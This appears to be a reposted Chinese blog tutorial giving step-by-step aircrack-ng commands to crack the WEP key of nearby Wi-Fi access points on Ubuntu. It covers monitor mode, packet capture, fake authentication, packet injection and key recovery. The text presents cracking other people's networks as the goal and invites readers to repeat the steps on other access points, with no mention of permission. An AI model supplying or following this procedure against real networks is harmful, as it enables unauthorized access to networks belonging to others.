轉自
http://www.cnblogs.com/zero1665/archive/2010/06/10/1755915.html
一、安裝ubuntu和aircrack-ng
先安裝 Ubuntu,更新系統到最新
終端中輸入 sudo apt-get install aircrack-ng 安裝aircrack-ng
沒聯網的話 到別的電腦上網下載aircrack-ng Ubuntu DEB安裝包 安裝
下載地址:http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download
二、破解過程
1、啓動無線網卡的監控模式,在終端中輸入:sudo airmon-ng start wlan0
(wlan0是無線網卡的端口,可在終端中輸入 ifconfig 查看)
2、查看無線AP在終端中輸入:
sudo airodump-ng mon0
(特別說明:啓動監控模式後無線網的端口現在是 mon0 !!!)
看看有哪些採用wep加密的AP在線,然後按 ctrl+c 退出,保留終端
3、抓包
另開一個終端,輸入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 後面跟着的6是要破解的AP工作頻道,--bissid後面跟着的AP'sMAC是要欲破解AP的MAC地址,-w後面跟着wep的是抓下來的數據包DATA保存的文件名,具體情況根據步驟2裏面的在線AP更改頻道和MAC地址,DATA保存的文件名可隨便命名)
4、與AP建立虛擬連接
再另開一個終端,輸入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h後面跟着的My MAC是自己的無線網卡的MAC地址,命令:
iwlist wlan0 scanning
可查看自己的MAC地址;自己的MAC 地址爲ifconfig命令下wlan0對應的mac地址)
5、進行注入
成功建立虛擬連接後輸入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
現在回頭看下步驟3的終端是不是DATA在開始飛漲!(那串ff照抄就行)
6、解密
收集有15000個以上的DATA之後,另開一個終端,輸入:
sudo aircrack-ng wep*.cap
進行解密
(如果沒算出來的話,繼續等,aircrack-ng 會在DATA每增加多15000個之後就自動再運行,直到算出密碼爲至,注意此處文件的名字要與步驟3裏面設置的名字一樣,且*號是必需的)
7、收工
破解出密碼後在終端中輸入 sudo airmon-ng stop mon0 關閉監控模式,不然無線網卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關閉終端都是不行的。現在可以衝浪去了,或者重複步聚1-7破解其 它的AP